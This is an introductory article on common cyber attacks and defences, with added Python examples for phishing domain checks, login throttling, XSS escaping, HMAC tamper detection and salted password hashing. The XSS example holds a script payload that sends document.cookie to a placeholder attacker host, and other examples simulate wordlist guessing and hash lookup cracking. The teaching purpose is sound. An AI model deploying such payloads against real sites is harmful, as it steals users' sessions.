A Big Picture Introduction to Cybersecurity
Learn about cybersecurity, why it is important and how to remain secure online.
We live in an interconnected world today where most people have access to the internet, and our lives and livelihoods are increasingly dependent on technology. Many online activities involve sending our data across networks we do not control, and if that is not done safely the data is exposed to attack. This is why cybersecurity is important.
Cybersecurity is the practice of defending internet activities, devices, servers, applications and online data from attack. Proper security measures protect our devices and applications from unauthorised access, protect our data from tampering and theft, and ensure that data and online services stay trustworthy and available.
Essentially cybersecurity is about ensuring the following:
Ensuring attackers don't have unauthorized access to confidential information or data.
Ensuring attackers cannot modify or delete the data.
Ensuring attackers do not overwhelm a system.
Cybersecurity Triad (C.I.A)
There are three important aspects of any secure system. They include:
C - Confidentiality: Confidentiality is about protecting data from being viewed by unauthorized parties. In other words, it ensures the privacy of data.
I - Integrity: Integrity means that data cannot be changed or deleted by any unauthorized party, and that any tampering can be detected.
A - Availability: Availability means that data and services remain accessible to authorized users whenever they need them.
To understand how to take proper security measures, we will explore different forms of cyber attack and how to mitigate them.
Different types of cyber attacks
Phishing Attack 🎣
Phishing attacks are one of the most common forms of cybersecurity threats. This is when an attacker tries to trick a victim into handing over private or sensitive information, like their passwords or credit card numbers.
The attacker sends the victim a message, usually an email or text message, that mimics a company or brand and contains a link to a fake website that looks almost identical to the real one. The site usually has a form asking visitors to enter sensitive data like credit card details, passwords, or wallet secret keys. If the victim falls for the trick and enters their data, it is stored on the attacker's server and the site responds with a generic confirmation message so that nothing seems wrong. The attacker can then use that data to gain access to the victim's accounts, drain personal funds or impersonate the victim.
Phishing attacks are common, but you can defend against them by verifying the legitimacy of messages received from any organisation, ideally by contacting the organisation through a channel you already know rather than through the message itself. Also, check the domain of websites you visit: a fake URL such as support.good-bank.cr.com differs from the real one, support.goodbank.com, in the part that actually matters, the registered domain (cr.com versus goodbank.com). Everything to the left of that is a subdomain the attacker can choose freely.
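The domain check described above, as an added example (not code from the original article): it pulls the hostname out of a URL and compares only its registrable domain against an allowlist, so lookalike subdomains, `user@host` tricks and punycode labels are all rejected. The allowlist containing only goodbank.com is an assumption for the example, and the "last two labels" rule is a simplification that does not handle suffixes like co.uk.

```python
from urllib.parse import urlsplit

# Constructed allowlist of the organisation's real registrable domains. This is
# an assumption for the example; the article only names goodbank.com.
LEGIT_DOMAINS = {"goodbank.com"}


def registrable_domain(url: str) -> str:
    """Return the registrable part of the URL's host, e.g. 'goodbank.com'.

    Simplified: takes the last two labels and does not consult the Public
    Suffix List, so multi-part suffixes such as co.uk are not handled. Good
    enough for the .com-style domains in the article's example.
    """
    host = urlsplit(url).hostname or ""          # drops scheme, userinfo, port, path
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_legit(url: str) -> bool:
    """True only if the host's registrable domain is one we actually trust."""
    host = (urlsplit(url).hostname or "").lower()
    # Punycode labels (xn--...) can hide lookalike Unicode characters; treat as suspicious.
    if any(label.startswith("xn--") for label in host.split(".")):
        return False
    return registrable_domain(url) in LEGIT_DOMAINS


if __name__ == "__main__":
    for u in ["https://support.goodbank.com/login",
              "https://support.good-bank.cr.com/login",
              "https://goodbank.com.evil.example/login",
              "https://support.goodbank.com@evil.example/login"]:
        verdict = "OK " if is_legit(u) else "BAD"
        print(f"{verdict} {u}  (registrable domain: {registrable_domain(u)})")
```

Note that the `support.goodbank.com@evil.example` case is resolved correctly only because `urlsplit(...).hostname` discards the userinfo part; a naive "does the string contain goodbank.com" check passes every one of the bad URLs.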
Malware 🕷️
Malware is an invasive software which once downloaded into a device or server can perform malicious attacks on the system.
There are different types of malware:
Viruses: This is the most common type of malware. A virus attaches itself to a legitimate program or file and spreads to other devices when that file is shared over a network or carried on a storage device. Viruses cause a range of damage, from less severe effects like slowing down a device/server to more severe ones like deleting files from the system.
Worms: This is malicious software that is capable of replicating itself without human intervention. Worms usually spread across a network such as a Local Area Network (LAN) or an organisation's private network.
Trojan horse: This malware disguises itself as legitimate software so that the victim installs it. Once running it can open a backdoor that lets the attacker control the device/server from a remote location.
Ransomware: This is often the most damaging form of malware. It encrypts (or in some cases steals) the information on a device/server so that it is inaccessible to the user, and the attacker demands a ransom to restore the encrypted or stolen data. A well-known example is WannaCry, which spread rapidly across the globe in 2017, encrypting data on Windows PCs and demanding ransom payments in Bitcoin for decryption.
You can protect yourself from malware by keeping software up to date, running reputable antivirus software, not connecting to or sharing removable media with infected computers, and not downloading software indiscriminately from the internet.
SQL injection 💉
This is when an attacker supplies input that an application inserts directly into a SQL query, so that the input is executed as SQL commands against the organisation's database. SQL (Structured Query Language) is the language used to perform actions, known as queries, on relational databases. An attacker can use SQL injection to steal data from the database, falsify database tables or even delete all the organisation's data.
Yahoo is a famous company that came under an SQL injection attack. In 2012, an SQL injection attack on Yahoo’s website exposed usernames and passwords of around 450,000 accounts.
SQL injection is prevented primarily by using parameterised queries (prepared statements), so that user input is never concatenated into SQL text; by validating incoming input; by using ORMs or query builders that parameterise queries for you; and by giving the application's database account the least privilege it needs (including row-level security), so that an injected query cannot read or delete data the application should never touch.
Brute force attack 🔨
This is when an attacker systematically tries every possible password combination to gain unauthorized access to a system or account, exploiting weak or common passwords to break into secure areas.
Brute force attacks can be prevented by using stronger passwords and enabling multi-factor authentication on applications you use. Companies can also protect their users from getting hacked by using rate-limiting, bot prevention mechanisms like Captcha, and offering alternative means of authentication like OTPs, magic links and passkeys.
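The server-side rate-limiting mentioned above, as an added example that is not code from the original article: a sliding-window throttle on failed logins keyed by account and client IP, with a small simulation showing how many of an attacker's guesses actually get evaluated. The limits (5 failures per 300 seconds) and the sample account, IP and password are assumptions for the example.

```python
import hmac
from collections import defaultdict, deque


class LoginThrottle:
    """Sliding-window limiter on failed logins, keyed by (account, client IP).

    After max_failures failures within window seconds the key is refused until
    the oldest failure ages out. Keying on the account alone would let an
    attacker lock real users out; keying on the IP alone is defeated by a
    botnet, so this keys on both. The defaults are assumptions for the example.
    """

    def __init__(self, max_failures: int = 5, window: float = 300.0):
        self.max_failures = max_failures
        self.window = window
        self.failures = defaultdict(deque)   # (account, ip) -> failure timestamps

    def _prune(self, key, now: float) -> None:
        q = self.failures[key]
        while q and now - q[0] >= self.window:
            q.popleft()

    def allowed(self, account: str, ip: str, now: float) -> bool:
        self._prune((account, ip), now)
        return len(self.failures[(account, ip)]) < self.max_failures

    def record_failure(self, account: str, ip: str, now: float) -> None:
        self.failures[(account, ip)].append(now)

    def record_success(self, account: str, ip: str) -> None:
        self.failures.pop((account, ip), None)


def attempt(throttle, account, ip, guess, real_password, now) -> str:
    """One login attempt. Returns 'throttled', 'denied' or 'ok'.

    real_password stands in for a stored credential; a real system compares
    password hashes rather than plaintext (see the rainbow-table example)."""
    if not throttle.allowed(account, ip, now):
        return "throttled"                    # the guess is not even evaluated
    if hmac.compare_digest(guess.encode(), real_password.encode()):
        throttle.record_success(account, ip)
        return "ok"
    throttle.record_failure(account, ip, now)
    return "denied"


def simulate_attack(guesses, real_password, max_failures=5, window=300.0) -> int:
    """Feed a wordlist at one guess per second from a single IP; return how many
    guesses were actually evaluated before the throttle cut the attacker off."""
    t = LoginThrottle(max_failures, window)
    evaluated = 0
    for i, g in enumerate(guesses):
        if attempt(t, "alice", "203.0.113.7", g, real_password, now=float(i)) != "throttled":
            evaluated += 1
    return evaluated


if __name__ == "__main__":
    wordlist = [f"password{i}" for i in range(100)] + ["s3cret!"]
    print(simulate_attack(wordlist, "s3cret!"))   # 5: the correct guess never gets checked
```

The throttle turns an online brute force from thousands of guesses per minute into a handful per window, which is why attackers prefer offline cracking of stolen hashes (covered under rainbow tables) or distributed guessing from many IPs, and why MFA is the stronger control.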
Distributed Denial of Service (DDoS) attack 💥
DDoS happens when a server or application is intentionally flooded with more traffic than it can handle, sent from many devices at once (typically a botnet of compromised machines). When this happens, the application can slow down, stop responding, run up hosting costs or crash outright.
A popular DDoS attack is the 2016 Dyn attack, where a massive botnet overwhelmed the DNS provider Dyn, causing widespread outages and disrupting major websites like Twitter, Netflix, and Reddit.
DDoS attacks are mitigated by putting a Content Delivery Network or DDoS-protection service (e.g. Cloudflare) in front of your site to absorb and filter traffic, setting up firewalls, rate-limiting, adding traffic caps, and keeping redundant backup servers available in case of an incident.
Cross-Site Scripting (XSS) 📜
This is when an attacker injects malicious scripts into a website that is then served to other users. The script runs in the victim's browser with the site's privileges, so it can steal session data (cookies or tokens) or carry out actions on behalf of the user.
XSS can be prevented when building websites by escaping user-supplied data before inserting it into HTML, using templating frameworks that escape output by default, setting a Content Security Policy that blocks inline JavaScript, and marking session cookies HttpOnly and Secure so that scripts cannot read them even if an injection slips through.
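The injection and its fix side by side, as an added example that is not code from the original article: a comment renderer that interpolates user input raw, the same renderer with output escaping, and the Set-Cookie flags that keep the session token away from scripts. The attacker host attacker.example and the sample comment are constructed for the example.

```python
import html

# Constructed attacker-supplied comment. attacker.example is a placeholder host.
PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"


def render_comment_vulnerable(author: str, body: str) -> str:
    """Interpolates user input straight into the page: the payload becomes live markup."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author: str, body: str) -> str:
    """Escapes each user-controlled value for the HTML text context before insertion.

    html.escape covers element text and quoted attribute values only; data placed
    inside a <script> block, an event handler or a URL needs context-specific
    encoding, which is why a templating engine with autoescape is the better default."""
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


def session_cookie_header(token: str) -> str:
    """Set-Cookie flags that keep the session token out of reach of page scripts
    (HttpOnly), off plain HTTP (Secure) and out of most cross-site requests (SameSite)."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


def contains_live_script(rendered_html: str) -> bool:
    """Crude check used only to show the difference: does a real <script> tag survive?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))   # browser would run the script
    print(render_comment_safe("mallory", PAYLOAD))         # shows the text, runs nothing
    print(session_cookie_header("abc123"))
```

Even with HttpOnly set, an injected script can still send requests with the user's cookies attached, so the cookie flags limit the damage; the escaping is what removes the injection.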
Man-in-the-middle attack (MITM) 👨🏻💻
A Man-in-the-Middle (MITM) attack happens when an attacker secretly positions themselves between two communicating parties and intercepts, and potentially alters, the traffic between them. This means the attacker can intercept a message from the sender, and steal or alter it before it reaches the receiver.
The most common way to mitigate MITM attacks is encryption combined with authentication. Using HTTPS instead of HTTP ensures that a user's requests are encrypted and that the browser verifies the server's certificate, so an attacker on the path can neither read the traffic nor tamper with it unnoticed. HTTPS does not cover every channel, though, so you can also protect against MITM by tunnelling traffic through a VPN, using end-to-end encryption for messages, and using intrusion detection systems (IDS) to spot interception attempts on the network.
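The "alter it before it is sent to the receiver" half of the attack and the check that defeats it, as an added example that is not code from the original article. Both parties share a secret key (an assumption here; getting that key to the right party without an attacker substituting their own is exactly the problem that HTTPS solves with certificates), the sender appends an HMAC tag, and the receiver refuses anything whose tag does not match. The payment message and key are constructed.

```python
import hashlib
import hmac
import secrets

TAG_LEN = 32   # SHA-256 output length in bytes


def protect(key: bytes, message: bytes) -> bytes:
    """Append an HMAC-SHA256 tag so the receiver can detect any change in transit."""
    return message + hmac.new(key, message, hashlib.sha256).digest()


def receive(key: bytes, packet: bytes):
    """Return the message if its tag verifies, otherwise None (constant-time compare)."""
    if len(packet) < TAG_LEN:
        return None
    message, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return message if hmac.compare_digest(tag, expected) else None


def mitm_rewrite(packet: bytes, old: bytes, new: bytes) -> bytes:
    """Simulated attacker on the path: edit the message bytes, leave the tag alone.
    Without the key the attacker cannot produce a matching tag for the new text."""
    return packet.replace(old, new, 1)


if __name__ == "__main__":
    key = secrets.token_bytes(32)   # assumed to have been shared out of band
    packet = protect(key, b"PAY 100 TO alice")
    print(receive(key, packet))                                        # b'PAY 100 TO alice'
    print(receive(key, mitm_rewrite(packet, b"alice", b"mallory")))    # None: rejected
```

The tag gives integrity and origin authentication only; the attacker can still read the message, which is why TLS encrypts the payload as well as authenticating it.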
Social Engineering 🧠
This happens when an attacker pretends to be a trusted authority to deceive a victim into divulging confidential information or performing actions that compromise security. A popular example of social engineering attacks is scam calls.
Common Terms Used in Cybersecurity
Rainbow tables: Rainbow tables are precomputed tables of password hashes that let an attacker recover a password from a stolen hash by lookup instead of hashing every guess. They only work against unsalted hashes, which is why passwords should be stored with a per-user salt and a deliberately slow hash.
Zero-day vulnerability: A zero-day vulnerability is a security flaw in software that is unknown to the vendor and yet to be fixed, making it susceptible to attacks at any time.
Zero-day exploit: A zero-day exploit is an attack that targets a vulnerability the vendor has not yet detected or patched.
Black hats and White hats: Black hats are hackers who exploit vulnerable parts of software for malicious purposes. White hats are hackers who detect vulnerabilities in software and inform the vendor about them.
Encryption: Encryption is the process of converting information into a coded format that only authorized parties can read, ensuring that the data remains private and secure from unauthorized access.
Backdoor: A backdoor is a hidden method or vulnerability in a software or system that allows unauthorized access to the data or functionalities, bypassing normal security measures.
Penetration testing: Penetration testing, or pen testing, is a simulated cyberattack on a computer system, network, or application to identify and exploit vulnerabilities, helping to improve security.
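To make the rainbow-table entry concrete, an added example that is not code from the original article: a tiny lookup table of unsalted SHA-256 hashes cracks a leaked hash instantly, while the same password stored with a random salt and PBKDF2 is not in any precomputed table. The wordlist, the 100,000-iteration work factor and the leaked hash are constructed for the example.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for a much larger precomputed table.
WORDLIST = ["123456", "password", "qwerty", "letmein", "hunter2"]
ITERATIONS = 100_000   # PBKDF2 work factor; an assumption for the example


def unsalted_sha256(password: str) -> str:
    """How a weak system stores passwords: one fixed hash per password, no salt."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(words):
    """Precompute unsalted digests once; every later lookup is a dict hit."""
    return {unsalted_sha256(w): w for w in words}


def crack_unsalted(table, digest_hex: str):
    """Recover a password from a leaked unsalted hash by lookup, no hashing needed."""
    return table.get(digest_hex)


def hash_password(password: str, salt: bytes = None):
    """Salted, deliberately slow hash. Returns (salt, digest); store both."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    leaked = unsalted_sha256("hunter2")            # constructed "stolen" hash
    print(crack_unsalted(table, leaked))           # hunter2
    salt, digest = hash_password("hunter2")
    print(crack_unsalted(table, digest.hex()))     # None
    print(verify_password("hunter2", salt, digest))  # True
```

Because every user gets a different salt, an attacker would need a separate precomputed table per salt, and the iteration count makes each guess expensive on top of that.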
Why Cybersecurity is important
Cybersecurity is essential to protect sensitive information and maintain the integrity of online interactions. It safeguards against cyber threats that can compromise personal data, financial information, and critical infrastructure. As cyber threats evolve, the demand for skilled cybersecurity professionals grows as companies search for more ways to secure their infrastructure.